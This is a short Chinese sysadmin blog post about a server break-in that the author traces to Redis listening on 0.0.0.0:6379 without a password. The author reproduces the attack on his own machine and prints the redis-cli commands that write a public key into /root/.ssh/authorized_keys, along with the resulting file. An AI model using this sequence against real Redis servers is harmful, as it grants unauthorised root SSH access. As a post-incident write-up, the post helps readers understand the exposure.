标签:redis漏洞
杀毒算完成了,可是他是怎么进来的呢。。。因为是我刚安装的系统,就只装了个redis和rabbitmq 其他应用都没有呢
我发现我的redis的 bind 0.0.0.0:6379
默认的。。。。应该是这边进来的。我自己做了下尝试。。。
[root@ll_sas01 ~/.
ssh
]
# redis-cli
127.0.0.1:6379>
set
aa
"公钥"
OK
127.0.0.1:6379> config
set
dir
/root/
.
ssh
/
OK
127.0.0.1:6379> config
set
dbfilename
"authorized_keys"
OK
127.0.0.1:6379> save
[root@ll_sas01 ~/.
ssh
]
# cat authorized_keys
ssh
-rsa AAAAB3NzaC1yc2EAAAABdadasdAAQEAvPgr
/WFKd9h/3e2ik6BmLj4OIdnBNJelaNCOAWwdKQx0WjDtFjN/BvO3vkg4awwYwp3K
+UyAGob438pZnqNR37d1RrU7OzBolJ9NnTLPF03gI2aZpfW439T167bxHmKWYzN5vexTNv2orKWaQxMJtjN3xAwzpxiugaiguoleTTxBKG9TFjjBDblLYAoaVdylRLQLUwfCJ
/WK50rK
++hawBS15t6r9
/zTuMD5TCsAJNEN88cPDOuEcnNwtLydtftH1BX3tPISSHtS4VwTr/LdAz40O9lKTTeU/JDHSIIRr95u2Y6/mhaLJwwLp/AFUB/NtF3HOIY75yG/F5k0q1fCaw
== root@dawdaw
夭寿拉。妈蛋的竟然真的这样可以吧自己的公钥刷进来。。。
奉劝大家不要黑别人的服务器,运维何苦为难运维。。。
通过这个网站可以查到开放的数据,就不给大家公开了,我得数据可能就是在这里被获取的。
黑客攻击事件到此完了
本文出自 “aolens·程超” 博客,请务必保留此出处http://aolens.blog.51cto.com/7021142/1865994
标签:redis漏洞
原文地址:http://aolens.blog.51cto.com/7021142/1865994